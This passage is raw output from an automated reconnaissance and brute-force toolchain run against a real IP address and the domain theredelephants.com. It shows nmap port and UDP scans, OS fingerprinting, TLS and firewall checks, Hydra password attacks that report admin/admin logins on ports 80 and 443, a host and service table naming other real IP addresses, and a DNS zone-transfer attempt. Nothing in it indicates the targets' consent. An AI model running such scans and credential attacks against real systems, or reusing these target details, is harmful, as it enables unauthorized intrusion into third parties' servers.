649. 2222/tcp open EtherNetIP-1
650. #######################################################################################################################################
651. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:02 EST
652. Nmap scan report for 104.196.67.80
653. Host is up (0.12s latency).
654. Not shown: 2 filtered ports
655. PORT STATE SERVICE
656. 53/udp open|filtered domain
657. 67/udp open|filtered dhcps
658. 68/udp open|filtered dhcpc
659. 69/udp open|filtered tftp
660. 88/udp open|filtered kerberos-sec
661. 123/udp open|filtered ntp
662. 139/udp open|filtered netbios-ssn
663. 161/udp open|filtered snmp
664. 162/udp open|filtered snmptrap
665. 389/udp open|filtered ldap
666. 520/udp open|filtered route
667. 2049/udp open|filtered nfs
668. #######################################################################################################################################
669. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:03 EST
670. Nmap scan report for 104.196.67.80
671. Host is up (0.23s latency).
672.  
673. PORT STATE SERVICE VERSION
674. 67/udp open|filtered dhcps
675. |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
676. Too many fingerprints match this host to give specific OS details
677. Network Distance: 18 hops
678.  
679. TRACEROUTE (using proto 1/icmp)
680. HOP RTT ADDRESS
681. 1 117.96 ms 10.245.200.1
682. 2 142.92 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
683. 3 118.75 ms 195.42.145.65
684. 4 127.60 ms 108.170.244.240
685. 5 129.80 ms 72.14.238.53
686. 6 198.86 ms 216.239.54.84
687. 7 210.05 ms 209.85.255.252
688. 8 210.11 ms 216.239.41.232
689. 9 ... 17
690. 18 212.31 ms 104.196.67.80
691. #######################################################################################################################################
692. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:05 EST
693. Nmap scan report for 104.196.67.80
694. Host is up (0.21s latency).
695.  
696. PORT STATE SERVICE VERSION
697. 68/udp open|filtered dhcpc
698. Too many fingerprints match this host to give specific OS details
699. Network Distance: 18 hops
700.  
701. TRACEROUTE (using proto 1/icmp)
702. HOP RTT ADDRESS
703. 1 121.82 ms 10.245.200.1
704. 2 121.86 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
705. 3 122.58 ms 195.42.145.65
706. 4 130.10 ms 108.170.244.240
707. 5 130.08 ms 72.14.238.53
708. 6 202.55 ms 216.239.54.84
709. 7 213.80 ms 209.85.255.252
710. 8 212.77 ms 216.239.41.232
711. 9 ... 17
712. 18 209.18 ms 104.196.67.80
713. #######################################################################################################################################
714. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:07 EST
715. Nmap scan report for 104.196.67.80
716. Host is up (0.22s latency).
717.  
718. PORT STATE SERVICE VERSION
719. 69/udp open|filtered tftp
720. Too many fingerprints match this host to give specific OS details
721. Network Distance: 18 hops
722.  
723. TRACEROUTE (using proto 1/icmp)
724. HOP RTT ADDRESS
725. 1 118.49 ms 10.245.200.1
726. 2 170.38 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
727. 3 119.32 ms 195.42.145.65
728. 4 126.81 ms 108.170.244.240
729. 5 126.78 ms 72.14.238.53
730. 6 198.99 ms 216.239.54.84
731. 7 210.34 ms 209.85.255.252
732. 8 210.38 ms 216.239.41.232
733. 9 ... 17
734. 18 207.84 ms 104.196.67.80
735. #######################################################################################################################################
736.  
737. ^ ^
738. _ __ _ ____ _ __ _ _ ____
739. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
740. | V V // o // _/ | V V // 0 // 0 // _/
741. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
742. <
743. ...'
744.  
745. WAFW00F - Web Application Firewall Detection Tool
746.  
747. By Sandro Gauci && Wendel G. Henrique
748.  
749. Checking http://104.196.67.80
750. Generic Detection results:
751. The site http://104.196.67.80 seems to be behind a WAF or some sort of security solution
752. Reason: Blocking is being done at connection/packet level.
753. Number of requests: 12
754. #######################################################################################################################################
755. http://104.196.67.80 [404 Not Found] Country[UNITED STATES][US], HTML5, IP[104.196.67.80], Title[Site Not Configured | 404 Not Found], probably WordPress
756. #######################################################################################################################################
757.  
758. wig - WebApp Information Gatherer
759.  
760.  
761. Scanning http://104.196.67.80...
762. _________________ SITE INFO __________________
763. IP Title
764. 104.196.67.80 Site Not Configured | 404 No
765.  
766. __________________ VERSION ___________________
767. Name Versions Type
768.  
769. ______________________________________________
770. Time: 32.2 sec Urls: 598 Fingerprints: 40401
771. #######################################################################################################################################
772. HTTP/1.1 404 Not Found
773. Date: Thu, 08 Nov 2018 05:11:38 GMT
774. Content-Type: text/html
775. ETag: W/"5be3223e-822"
776. Content-Encoding: gzip
777. Connection: keep-alive
778. #######################################################################################################################################
779. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:11 EST
780. Nmap scan report for 104.196.67.80
781. Host is up (0.21s latency).
782.  
783. PORT STATE SERVICE VERSION
784. 123/udp open|filtered ntp
785. Too many fingerprints match this host to give specific OS details
786. Network Distance: 18 hops
787.  
788. TRACEROUTE (using proto 1/icmp)
789. HOP RTT ADDRESS
790. 1 119.24 ms 10.245.200.1
791. 2 240.18 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
792. 3 120.16 ms 195.42.145.65
793. 4 128.15 ms 108.170.244.240
794. 5 127.42 ms 72.14.238.53
795. 6 199.49 ms 216.239.54.84
796. 7 210.91 ms 209.85.255.252
797. 8 211.28 ms 216.239.41.232
798. 9 ... 17
799. 18 208.48 ms 104.196.67.80
800. #######################################################################################################################################
801. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:14 EST
802. Nmap scan report for 104.196.67.80
803. Host is up (0.16s latency).
804.  
805. PORT STATE SERVICE VERSION
806. 161/tcp filtered snmp
807. 161/udp open|filtered snmp
808. Too many fingerprints match this host to give specific OS details
809. Network Distance: 18 hops
810.  
811. TRACEROUTE (using proto 1/icmp)
812. HOP RTT ADDRESS
813. 1 119.45 ms 10.245.200.1
814. 2 119.49 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
815. 3 120.08 ms 195.42.145.65
816. 4 127.88 ms 108.170.244.240
817. 5 130.71 ms 72.14.238.53
818. 6 200.08 ms 216.239.54.84
819. 7 240.66 ms 209.85.255.252
820. 8 211.57 ms 216.239.41.232
821. 9 ... 17
822. 18 209.02 ms 104.196.67.80
823. #######################################################################################################################################
824. ^ ^
825. _ __ _ ____ _ __ _ _ ____
826. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
827. | V V // o // _/ | V V // 0 // 0 // _/
828. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
829. <
830. ...'
831.  
832. WAFW00F - Web Application Firewall Detection Tool
833.  
834. By Sandro Gauci && Wendel G. Henrique
835.  
836. Checking https://104.196.67.80
837. Generic Detection results:
838. The site https://104.196.67.80 seems to be behind a WAF or some sort of security solution
839. Reason: Blocking is being done at connection/packet level.
840. Number of requests: 12
841. #######################################################################################################################################
842. https://104.196.67.80 [404 Not Found] Country[UNITED STATES][US], HTML5, HTTPServer[nginx], IP[104.196.67.80], Title[Site Not Configured | 404 Not Found], probably WordPress, nginx
843. #######################################################################################################################################
844.  
845.  
846.  
847. AVAILABLE PLUGINS
848. -----------------
849.  
850. PluginOpenSSLCipherSuites
851. PluginCompression
852. PluginCertInfo
853. PluginChromeSha1Deprecation
854. PluginSessionResumption
855. PluginHSTS
856. PluginSessionRenegotiation
857. PluginHeartbleed
858.  
859.  
860.  
861. CHECKING HOST(S) AVAILABILITY
862. -----------------------------
863.  
864. 104.196.67.80:443 => 104.196.67.80:443
865.  
866.  
867.  
868. SCAN RESULTS FOR 104.196.67.80:443 - 104.196.67.80:443
869. ------------------------------------------------------
870.  
871. * Deflate Compression:
872. OK - Compression disabled
873.  
874. * Session Renegotiation:
875. Client-initiated Renegotiations: OK - Rejected
876. Secure Renegotiation: OK - Supported
877.  
878. * Certificate - Content:
879. SHA1 Fingerprint: 0707f8a55c34596e0f7f1eabf202d40d9f0505cd
880. Common Name: *.wpengine.com
881. Issuer: RapidSSL RSA CA 2018
882. Serial Number: 050E0BC8753CB966CCD109DFB99C23B2
883. Not Before: Feb 1 00:00:00 2018 GMT
884. Not After: Jul 20 12:00:00 2019 GMT
885. Signature Algorithm: sha256WithRSAEncryption
886. Public Key Algorithm: rsaEncryption
887. Key Size: 2048 bit
888. Exponent: 65537 (0x10001)
889. X509v3 Subject Alternative Name: {'DNS': ['*.wpengine.com', 'wpengine.com']}
890.  
891. * Certificate - Trust:
892. Hostname Validation: FAILED - Certificate does NOT match 104.196.67.80
893. Google CA Store (09/2015): OK - Certificate is trusted
894. Java 6 CA Store (Update 65): OK - Certificate is trusted
895. Microsoft CA Store (09/2015): OK - Certificate is trusted
896. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
897. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
898. Certificate Chain Received: ['*.wpengine.com', 'RapidSSL RSA CA 2018', 'DigiCert Global Root CA']
899.  
900. * Certificate - OCSP Stapling:
901. NOT SUPPORTED - Server did not send back an OCSP response.
902.  
903. * Session Resumption:
904. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
905. With TLS Session Tickets: OK - Supported
906.  
907. * SSLV2 Cipher Suites:
908. Server rejected all cipher suites.
909.  
910. * SSLV3 Cipher Suites:
911. Server rejected all cipher suites.
912.  
913.  
914.  
915. SCAN COMPLETED IN 4.49 S
916. ------------------------
917. Version: 1.11.12-static
918. OpenSSL 1.0.2-chacha (1.0.2g-dev)
919.  
920. Connected to 104.196.67.80
921.  
922. Testing SSL server 104.196.67.80 on port 443 using SNI name 104.196.67.80
923.  
924. TLS Fallback SCSV:
925. Server supports TLS Fallback SCSV
926.  
927. TLS renegotiation:
928. Session renegotiation not supported
929.  
930. TLS Compression:
931. Compression disabled
932.  
933. Heartbleed:
934. TLS 1.2 not vulnerable to heartbleed
935. TLS 1.1 not vulnerable to heartbleed
936. TLS 1.0 not vulnerable to heartbleed
937.  
938. Supported Server Cipher(s):
939. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
940. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
941. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
942. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
943. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
944. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
945. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
946. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
947. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
948. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
949. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
950. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
951. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
952. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
953. Accepted TLSv1.2 256 bits AES256-SHA256
954. Accepted TLSv1.2 256 bits AES256-SHA
955. Accepted TLSv1.2 128 bits AES128-SHA256
956. Accepted TLSv1.2 128 bits AES128-SHA
957. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
958. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
959. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
960. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
961. Accepted TLSv1.1 256 bits AES256-SHA
962. Accepted TLSv1.1 128 bits AES128-SHA
963.  
964. SSL Certificate:
965. Signature Algorithm: sha256WithRSAEncryption
966. RSA Key Strength: 2048
967.  
968. Subject: *.wpengine.com
969. Altnames: DNS:*.wpengine.com, DNS:wpengine.com
970. Issuer: RapidSSL RSA CA 2018
971.  
972. Not valid before: Feb 1 00:00:00 2018 GMT
973. Not valid after: Jul 20 12:00:00 2019 GMT
974.  
975. #######################################################################################################################################
976.  
977. I, [2018-11-08T00:18:21.755791 #4160] INFO -- : Initiating port scan
978. I, [2018-11-08T00:19:25.568537 #4160] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-08_00-18-21.xml
979. I, [2018-11-08T00:19:25.569589 #4160] INFO -- : Discovered open port: 104.196.67.80:80
980. I, [2018-11-08T00:19:26.484740 #4160] INFO -- : Discovered open port: 104.196.67.80:443
981. I, [2018-11-08T00:19:28.202920 #4160] INFO -- : <<<Enumerating vulnerable applications>>>
982.  
983.  
984. --------------------------------------------------------
985. <<<Yasuo discovered following vulnerable applications>>>
986. --------------------------------------------------------
987. +----------+--------------------+-------------------+----------+----------+
988. | App Name | URL to Application | Potential Exploit | Username | Password |
989. +----------+--------------------+-------------------+----------+----------+
990. +----------+--------------------+-------------------+----------+----------+
991. #######################################################################################################################################
992. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:22 EST
993. NSE: Loaded 148 scripts for scanning.
994. NSE: Script Pre-scanning.
995. Initiating NSE at 00:22
996. Completed NSE at 00:22, 0.00s elapsed
997. Initiating NSE at 00:22
998. Completed NSE at 00:22, 0.00s elapsed
999. Initiating Parallel DNS resolution of 1 host. at 00:22
1000. Completed Parallel DNS resolution of 1 host. at 00:22, 16.50s elapsed
1001. Initiating SYN Stealth Scan at 00:22
1002. Scanning 104.196.67.80 [474 ports]
1003. Discovered open port 443/tcp on 104.196.67.80
1004. Discovered open port 80/tcp on 104.196.67.80
1005. Discovered open port 2222/tcp on 104.196.67.80
1006. Completed SYN Stealth Scan at 00:22, 7.36s elapsed (474 total ports)
1007. Initiating Service scan at 00:22
1008. Scanning 3 services on 104.196.67.80
1009. Completed Service scan at 00:23, 33.97s elapsed (3 services on 1 host)
1010. Initiating OS detection (try #1) against 104.196.67.80
1011. Retrying OS detection (try #2) against 104.196.67.80
1012. Initiating Traceroute at 00:23
1013. Completed Traceroute at 00:23, 0.13s elapsed
1014. Initiating Parallel DNS resolution of 2 hosts. at 00:23
1015. Completed Parallel DNS resolution of 2 hosts. at 00:23, 16.50s elapsed
1016. NSE: Script scanning 104.196.67.80.
1017. Initiating NSE at 00:23
1018. Completed NSE at 00:23, 8.07s elapsed
1019. Initiating NSE at 00:23
1020. Completed NSE at 00:23, 0.00s elapsed
1021. Nmap scan report for 104.196.67.80
1022. Host is up (0.12s latency).
1023. Not shown: 468 filtered ports
1024. PORT STATE SERVICE VERSION
1025. 25/tcp closed smtp
1026. 80/tcp open http-proxy Squid http proxy
1027. | http-methods:
1028. |_ Supported Methods: GET HEAD
1029. |_http-open-proxy: Proxy might be redirecting requests
1030. |_http-title: Site Not Configured | 404 Not Found
1031. 139/tcp closed netbios-ssn
1032. 443/tcp open ssl/http nginx
1033. | http-methods:
1034. |_ Supported Methods: GET HEAD
1035. |_http-server-header: nginx
1036. |_http-title: Site Not Configured | 404 Not Found
1037. | ssl-cert: Subject: commonName=*.wpengine.com
1038. | Subject Alternative Name: DNS:*.wpengine.com, DNS:wpengine.com
1039. | Issuer: commonName=RapidSSL RSA CA 2018/organizationName=DigiCert Inc/countryName=US
1040. | Public Key type: rsa
1041. | Public Key bits: 2048
1042. | Signature Algorithm: sha256WithRSAEncryption
1043. | Not valid before: 2018-02-01T00:00:00
1044. | Not valid after: 2019-07-20T12:00:00
1045. | MD5: 78f7 9fa1 664d 3813 0245 5d39 813d d072
1046. |_SHA-1: 0707 f8a5 5c34 596e 0f7f 1eab f202 d40d 9f05 05cd
1047. |_ssl-date: TLS randomness does not represent time
1048. | tls-alpn:
1049. | h2
1050. |_ http/1.1
1051. | tls-nextprotoneg:
1052. | h2
1053. |_ http/1.1
1054. 445/tcp closed microsoft-ds
1055. 2222/tcp open ssh ProFTPD mod_sftp 0.9.9 (protocol 2.0)
1056. Device type: general purpose|storage-misc|broadband router|WAP|phone
1057. Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (94%), HP embedded (91%), Asus embedded (87%), Google Android 4.X (87%)
1058. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel cpe:/h:asus:rt-ac66u cpe:/o:google:android:4.0
1059. Aggressive OS guesses: Linux 3.16 - 4.6 (94%), Linux 3.10 - 4.11 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 3.18 (91%), HP P2000 G3 NAS device (91%), Linux 3.2 - 4.9 (90%), Linux 3.16 (90%)
1060. No exact OS matches for host (test conditions non-ideal).
1061. Uptime guess: 85.924 days (since Tue Aug 14 03:12:44 2018)
1062. Network Distance: 2 hops
1063. TCP Sequence Prediction: Difficulty=261 (Good luck!)
1064. IP ID Sequence Generation: All zeros
1065.  
1066. TRACEROUTE (using port 25/tcp)
1067. HOP RTT ADDRESS
1068. 1 118.84 ms 10.245.200.1
1069. 2 118.84 ms 104.196.67.80
1070.  
1071. NSE: Script Post-scanning.
1072. Initiating NSE at 00:23
1073. Completed NSE at 00:23, 0.00s elapsed
1074. Initiating NSE at 00:23
1075. Completed NSE at 00:23, 0.00s elapsed
1076. Read data files from: /usr/bin/../share/nmap
1077. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1078. Nmap done: 1 IP address (1 host up) scanned in 87.85 seconds
1079. Raw packets sent: 1015 (48.690KB) | Rcvd: 787 (361.519KB)
1080. #######################################################################################################################################
1081. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:23 EST
1082. NSE: Loaded 148 scripts for scanning.
1083. NSE: Script Pre-scanning.
1084. Initiating NSE at 00:23
1085. Completed NSE at 00:23, 0.00s elapsed
1086. Initiating NSE at 00:23
1087. Completed NSE at 00:23, 0.00s elapsed
1088. Initiating Parallel DNS resolution of 1 host. at 00:23
1089. Completed Parallel DNS resolution of 1 host. at 00:24, 16.50s elapsed
1090. Initiating UDP Scan at 00:24
1091. Scanning 104.196.67.80 [14 ports]
1092. Completed UDP Scan at 00:24, 2.15s elapsed (14 total ports)
1093. Initiating Service scan at 00:24
1094. Scanning 12 services on 104.196.67.80
1095. Service scan Timing: About 8.33% done; ETC: 00:43 (0:17:47 remaining)
1096. Completed Service scan at 00:25, 102.57s elapsed (12 services on 1 host)
1097. Initiating OS detection (try #1) against 104.196.67.80
1098. Retrying OS detection (try #2) against 104.196.67.80
1099. Initiating Traceroute at 00:25
1100. Completed Traceroute at 00:25, 7.19s elapsed
1101. Initiating Parallel DNS resolution of 1 host. at 00:25
1102. Completed Parallel DNS resolution of 1 host. at 00:26, 16.50s elapsed
1103. NSE: Script scanning 104.196.67.80.
1104. Initiating NSE at 00:26
1105. Completed NSE at 00:26, 20.36s elapsed
1106. Initiating NSE at 00:26
1107. Completed NSE at 00:26, 1.03s elapsed
1108. Nmap scan report for 104.196.67.80
1109. Host is up (0.16s latency).
1110.  
1111. PORT STATE SERVICE VERSION
1112. 53/udp open|filtered domain
1113. 67/udp open|filtered dhcps
1114. 68/udp open|filtered dhcpc
1115. 69/udp open|filtered tftp
1116. 88/udp open|filtered kerberos-sec
1117. 123/udp open|filtered ntp
1118. 137/udp filtered netbios-ns
1119. 138/udp filtered netbios-dgm
1120. 139/udp open|filtered netbios-ssn
1121. 161/udp open|filtered snmp
1122. 162/udp open|filtered snmptrap
1123. 389/udp open|filtered ldap
1124. 520/udp open|filtered route
1125. 2049/udp open|filtered nfs
1126. Too many fingerprints match this host to give specific OS details
1127.  
1128. TRACEROUTE (using port 138/udp)
1129. HOP RTT ADDRESS
1130. 1 119.31 ms 10.245.200.1
1131. 2 ... 3
1132. 4 117.88 ms 10.245.200.1
1133. 5 119.52 ms 10.245.200.1
1134. 6 119.51 ms 10.245.200.1
1135. 7 119.49 ms 10.245.200.1
1136. 8 119.47 ms 10.245.200.1
1137. 9 119.44 ms 10.245.200.1
1138. 10 119.41 ms 10.245.200.1
1139. 11 ... 18
1140. 19 117.81 ms 10.245.200.1
1141. 20 118.24 ms 10.245.200.1
1142. 21 ... 28
1143. 29 117.63 ms 10.245.200.1
1144. 30 117.02 ms 10.245.200.1
1145.  
1146. NSE: Script Post-scanning.
1147. Initiating NSE at 00:26
1148. Completed NSE at 00:26, 0.00s elapsed
1149. Initiating NSE at 00:26
1150. Completed NSE at 00:26, 0.00s elapsed
1151. Read data files from: /usr/bin/../share/nmap
1152. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1153. Nmap done: 1 IP address (1 host up) scanned in 171.92 seconds
1154. Raw packets sent: 135 (8.008KB) | Rcvd: 463 (94.350KB)
1155. ====================================================================================
1156. RUNNING BRUTE FORCE
1157. ====================================================================================
1158. __________ __ ____ ___
1159. \______ \_______ __ ___/ |_ ____ \ \/ /
1160. | | _/\_ __ \ | \ __\/ __ \ \ /
1161. | | \ | | \/ | /| | \ ___/ / \
1162. |______ / |__| |____/ |__| \___ >___/\ \
1163. \/ \/ \_/
1164.  
1165. + -- --=[BruteX v1.7 by 1N3
1166. + -- --=[http://crowdshield.com
1167.  
1168.  
1169. ################################### Running Port Scan ##############################
1170. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:26 EST
1171. Nmap scan report for 104.196.67.80
1172. Host is up (0.14s latency).
1173. Not shown: 21 filtered ports, 3 closed ports
1174. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1175. PORT STATE SERVICE
1176. 80/tcp open http
1177. 443/tcp open https
1178.  
1179. Nmap done: 1 IP address (1 host up) scanned in 19.11 seconds
1180.  
1181. ################################### Running Brute Force ############################
1182.  
1183. + -- --=[Port 21 closed... skipping.
1184. + -- --=[Port 22 closed... skipping.
1185. + -- --=[Port 23 closed... skipping.
1186. + -- --=[Port 25 closed... skipping.
1187. + -- --=[Port 80 opened... running tests...
1188. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1189.  
1190. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-08 00:26:57
1191. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
1192. [DATA] attacking http-get://104.196.67.80:80//
1193. [80][http-get] host: 104.196.67.80 login: admin password: admin
1194. [STATUS] attack finished for 104.196.67.80 (valid pair found)
1195. 1 of 1 target successfully completed, 1 valid password found
1196. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-08 00:26:58
1197. + -- --=[Port 110 closed... skipping.
1198. + -- --=[Port 139 closed... skipping.
1199. + -- --=[Port 162 closed... skipping.
1200. + -- --=[Port 389 closed... skipping.
1201. + -- --=[Port 443 opened... running tests...
1202. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1203.  
1204. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-08 00:26:58
1205. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
1206. [DATA] attacking http-gets://104.196.67.80:443//
1207. [443][http-get] host: 104.196.67.80 login: admin password: admin
1208. [STATUS] attack finished for 104.196.67.80 (valid pair found)
1209. 1 of 1 target successfully completed, 1 valid password found
1210. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-08 00:26:59
1211. + -- --=[Port 445 closed... skipping.
1212. + -- --=[Port 512 closed... skipping.
1213. + -- --=[Port 513 closed... skipping.
1214. + -- --=[Port 514 closed... skipping.
1215. + -- --=[Port 993 closed... skipping.
1216. + -- --=[Port 1433 closed... skipping.
1217. + -- --=[Port 1521 closed... skipping.
1218. + -- --=[Port 3306 closed... skipping.
1219. + -- --=[Port 3389 closed... skipping.
1220. + -- --=[Port 5432 closed... skipping.
1221. + -- --=[Port 5900 closed... skipping.
1222. + -- --=[Port 5901 closed... skipping.
1223. + -- --=[Port 8000 closed... skipping.
1224. + -- --=[Port 8080 closed... skipping.
1225. + -- --=[Port 8100 closed... skipping.
1226. + -- --=[Port 6667 closed... skipping.
1227.  
1228. ################################### Done! #############################################################################################
1229.  
1230. * default
1231. * default
1232. [*] Importing 'Nmap XML' data
1233. [*] Import: Parsing with 'Nokogiri v1.8.5'
1234. [*] Importing host 104.196.67.80
1235. [*] Successfully imported /usr/share/sniper/loot/104.196.67.80/nmap/nmap-104.196.67.80-udp.xml
1236. [*] Importing 'Nmap XML' data
1237. [*] Import: Parsing with 'Nokogiri v1.8.5'
1238. [*] Importing host 104.196.67.80
1239. [*] Successfully imported /usr/share/sniper/loot/104.196.67.80/nmap/nmap-104.196.67.80.xml
1240. [*] Importing 'Nmap XML' data
1241. [*] Import: Parsing with 'Nokogiri v1.8.5'
1242. [*] Importing host 104.196.67.80
1243. [*] Successfully imported /usr/share/sniper/loot/104.196.67.80/nmap/nmap-udp-104.196.67.80.xml
1244.  
1245. Hosts
1246. =====
1247.  
1248. address mac name os_name os_flavor os_sp purpose info comments
1249. ------- --- ---- ------- --------- ----- ------- ---- --------
1250. 91.121.2.184 Linux 2.6.X server
1251. 104.196.67.80 Linux 3.X server
1252. 195.55.47.89 Windows 3.X device
1253.  
1254. Services
1255. ========
1256.  
1257. host port proto name state info
1258. ---- ---- ----- ---- ----- ----
1259. 91.121.2.184 22 tcp ssh open OpenSSH 5.3 protocol 2.0
1260. 91.121.2.184 25 tcp smtp closed
1261. 91.121.2.184 53 udp domain unknown
1262. 91.121.2.184 67 udp dhcps unknown
1263. 91.121.2.184 68 udp dhcpc unknown
1264. 91.121.2.184 69 udp tftp unknown
1265. 91.121.2.184 80 tcp http open Apache httpd PHP 5.6.14
1266. 91.121.2.184 88 udp kerberos-sec unknown
1267. 91.121.2.184 123 udp ntp unknown
1268. 91.121.2.184 137 udp netbios-ns filtered
1269. 91.121.2.184 138 udp netbios-dgm filtered
1270. 91.121.2.184 139 tcp netbios-ssn closed
1271. 91.121.2.184 139 udp netbios-ssn unknown
1272. 91.121.2.184 161 udp snmp unknown
1273. 91.121.2.184 162 udp snmptrap unknown
1274. 91.121.2.184 389 tcp ldap open OpenLDAP 2.2.X - 2.3.X
1275. 91.121.2.184 389 udp ldap unknown
1276. 91.121.2.184 443 tcp ssl/ssl open Apache httpd SSL-only mode
1277. 91.121.2.184 445 tcp microsoft-ds closed
1278. 91.121.2.184 465 tcp ssl/smtps open
1279. 91.121.2.184 520 udp route unknown
1280. 91.121.2.184 993 tcp ssl/imaps open
1281. 91.121.2.184 2049 udp nfs unknown
1282. 91.121.2.184 7071 tcp ssl/iwg1 open
1283. 91.121.2.184 8080 tcp ssh open OpenSSH 5.3 protocol 2.0
1284. 104.196.67.80 25 tcp smtp closed
1285. 104.196.67.80 53 udp domain unknown
1286. 104.196.67.80 67 udp dhcps unknown
1287. 104.196.67.80 68 udp dhcpc unknown
1288. 104.196.67.80 69 udp tftp unknown
1289. 104.196.67.80 80 tcp http-proxy open Squid http proxy
1290. 104.196.67.80 88 udp kerberos-sec unknown
1291. 104.196.67.80 123 udp ntp unknown
1292. 104.196.67.80 137 udp netbios-ns filtered
1293. 104.196.67.80 138 udp netbios-dgm filtered
1294. 104.196.67.80 139 tcp netbios-ssn closed
1295. 104.196.67.80 139 udp netbios-ssn unknown
1296. 104.196.67.80 161 udp snmp unknown
1297. 104.196.67.80 162 udp snmptrap unknown
1298. 104.196.67.80 389 udp ldap unknown
1299. 104.196.67.80 443 tcp ssl/http open nginx
1300. 104.196.67.80 445 tcp microsoft-ds closed
1301. 104.196.67.80 520 udp route unknown
1302. 104.196.67.80 2049 udp nfs unknown
1303. 104.196.67.80 2222 tcp ssh open ProFTPD mod_sftp 0.9.9 protocol 2.0
1304. 195.55.47.89 25 tcp smtp closed
1305. 195.55.47.89 53 udp domain unknown
1306. 195.55.47.89 67 udp dhcps unknown
1307. 195.55.47.89 68 udp dhcpc unknown
1308. 195.55.47.89 69 udp tftp unknown
1309. 195.55.47.89 80 tcp http-proxy open Squid http proxy
1310. 195.55.47.89 88 udp kerberos-sec unknown
1311. 195.55.47.89 113 tcp ident closed
1312. 195.55.47.89 123 udp ntp unknown
1313. 195.55.47.89 137 udp netbios-ns filtered
1314. 195.55.47.89 138 udp netbios-dgm filtered
1315. 195.55.47.89 139 tcp netbios-ssn closed
1316. 195.55.47.89 139 udp netbios-ssn unknown
1317. 195.55.47.89 161 udp snmp unknown
1318. 195.55.47.89 162 udp snmptrap unknown
1319. 195.55.47.89 389 udp ldap unknown
1320. 195.55.47.89 443 tcp https open Microsoft-HTTPAPI/2.0
1321. 195.55.47.89 445 tcp microsoft-ds closed
1322. 195.55.47.89 520 udp route unknown
1323. 195.55.47.89 2049 udp nfs unknown
1324. #######################################################################################################################################
1325.  
1326. dnsenum VERSION:1.2.4
1327.  
1328. ----- theredelephants.com -----
1329.  
1330.  
1331. Host's addresses:
1332. __________________
1333.  
1334. theredelephants.com. 494 IN A 104.196.67.80
1335.  
1336.  
1337. Name Servers:
1338. ______________
1339.  
1340. ns57.domaincontrol.com. 86320 IN A 216.69.185.29
1341. ns58.domaincontrol.com. 86394 IN A 173.201.76.29
1342.  
1343.  
1344. Mail (MX) Servers:
1345. ___________________
1346.  
1347. theredelephants-com.mail.protection.outlook.com. 10 IN A 216.32.181.234
1348. theredelephants-com.mail.protection.outlook.com. 10 IN A 216.32.181.106
1349.  
1350.  
1351. Trying Zone Transfers and getting Bind Versions:
1352. _________________________________________________
1353.  
1354.  
1355. Trying Zone Transfer for theredelephants.com on ns57.domaincontrol.com ...
1356.  
